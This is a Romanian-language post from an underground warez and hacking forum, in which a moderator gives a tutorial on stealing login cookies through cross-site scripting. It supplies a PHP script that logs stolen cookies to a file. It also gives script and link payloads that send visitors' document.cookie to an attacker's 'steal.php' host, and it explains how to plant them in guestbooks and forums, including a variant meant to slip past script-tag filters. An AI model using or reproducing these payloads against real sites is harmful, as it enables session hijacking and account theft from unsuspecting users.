underground ddl forum
Pe underground forum gasesti softuri pentru windows si linux, games, music, movie, downloads, hack, cracks, software, warez , funny, porn, flash, manele, muzica, gratis, downloads
|
Lista Forumurilor Pe Tematici
|
underground ddl forum | Reguli | Inregistrare | Login
POZE UNDERGROUND DDL FORUM
Nu sunteti logat.
|
Nou pe simpatie:
Andreea_K din Caras Severin
 | Femeie
25 ani
Caras Severin
cauta Barbat
30 - 49 ani |
|
Untouchable
Moderator
 Din: San Venganza
Inregistrat: acum 18 ani
Postari: 1158
|
|
Cookiestealing-ul reprezinta cel mai de seama aspect al XSS (Cross-Site Scripting),chiar daca multi nu inteleg de ce un cookie este atat de important
Intra pe un site care necesita logare,iar dupa ce te loghezi,sterge tot ce e in bara de adrese si scrie:
Code:
java script:alert("documentˇcookie"); |
Dupa ce ai apasat Enter,ar trebui sa vezi un popup cu cateva informatii in el;de retinut e ca iti va arata acele informatii doar daca site-ul foloseste cookies.Mai jos e un exemplu cu ce anume poate contine un cookie dupa ce te loghezi:
Code:
username=Untouchable; password=Allmighty |
Acesta este desigur un cookie nesecurizat.Daca vreun tip de vulnerabilitate este gasit,si permite cuiva sa vada cookies ale altei persoane,orice cont de pe acel site este de obicei compromis. Iti va lua ceva timp sa gasesti un site care are asemenea puncte slabe,mai degraba poti gasi site-uri care stocheaza usernames si hash-uri in cookie. Cu toate acestea daca parola e hashed asta nu inseamna ca sistemul e compromis.Aceste hash-uri pot fi crack-uite si in anumite puncte atacatorul poate sa se logheze cu datele tale doar avandu-ti hash-urile.
Daca ai citit textul de mai sus cu atentie poate ai inteles de ce cookies sunt importante:au de obicei informatii importante despre useri in ele.
Cookiestealing-ul consta in doua parti.Trebuie sa ai un script ca sa poti accepta cookie si pe deasupra trebuie sa gasesti o modalitate sa trimiti cookie catre scriptul tau.Partea cea mai usoara e sa faci scriptul sa iti accepte cookie.Partea cea mai grea e sa gasesti o fisura in securitate care sa iti permita sa trimiti cookie scriptului tau.Mai jos e un script PHP care iti va accepta cookie:
Code:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
?> |
Acesta este un cookiestealer.Utilitatea acestui script consta in faptul ca accepta cookie cand este trecut ca variabila,in acest caz "cookie" , si il salveaza intr-un fisier numit cookielog.txt.De exemplu:
Code:
http://yoursite.com/steal.php?cookie= |
steal.php este numele de fisier al scriptului de mai sus, ? lasa scriptul sa afle ca ii vom da cateva variabiles,iar dupa aceasta putem seta cookie echivalent cu orice dorim,dar ceea ce vrem sa facem e sa setam cookie echivalent cu cookie din site-ul tinta.Aceasta este a doua si cea mai grea parte a cookiestealingului.
Multe site-uri pun niste filtre la intrare,asa incat nu iti poti introduce direct propriul cod.XSS-ul se ocupa cu gasirea de exploit-uri in interiorul filtrelor,dandu-ti voie sa iti pui propriul cod intr-un site.Acest lucru suna dificil si in majoritatea cazurilor nu este usor,insa uneori poate fi chiar foarte simplu.
Orice site care iti permite sa postezi un text,teoretic iti poate permite sa iti introduci si propriul cod.Cateva exemple de astefle de site-uri sunt forumurile,guestbooks,orice site cu "member profile",etc.Si oricare din aceste site-uri care au useri ce se logheaza,probabil folosesc cookies.
Sa presupunem ca un site cu login si guestbook nu are niciun fel de filtrare la ce am putea introduce in guestbook.Asta inseamna ca putem pune HMTL si javascript direct intr-un post in guestbook.Mai jos e un exemplu de cod pe care l-am putea pune intr-un guestbook si care va trimite cookies "afara":
Code:
<script>
window.location = 'http://yoursite.com/steal.php?cookie=' + documentˇcookie;
</script> |
Acum oricand cineva va intra pe pagina pe care ai postat acest cod,va fi redirectionat catre scriptul tau cu tot cu propriul cookie din site-ul respectiv in URL.daca te vei uita la log.txt,vei vedea cookies ale persoanelor care au intrat pe pagina respectiva.
Insa cookiestealingul nu este niciodata atat de usor.Sa presupunem ca administratorul site-ului decide sa filtreze tagurile scriptului.Atunci codul nu va mai merge,asa ca va trebui sa evitam filtrul .In acest caz vom folosi:
Code:
<a href="java script:void(document.location='http://yoursite.com/steal.php?cookie='+ documentˇcookie)">Click Me</a> |
In acest caz,cand userul da click pe link,va fi trimis catre stealer cu tot cu cookie.
_______________________________________
rest in peace...
|
|
| pus acum 18 ani |
|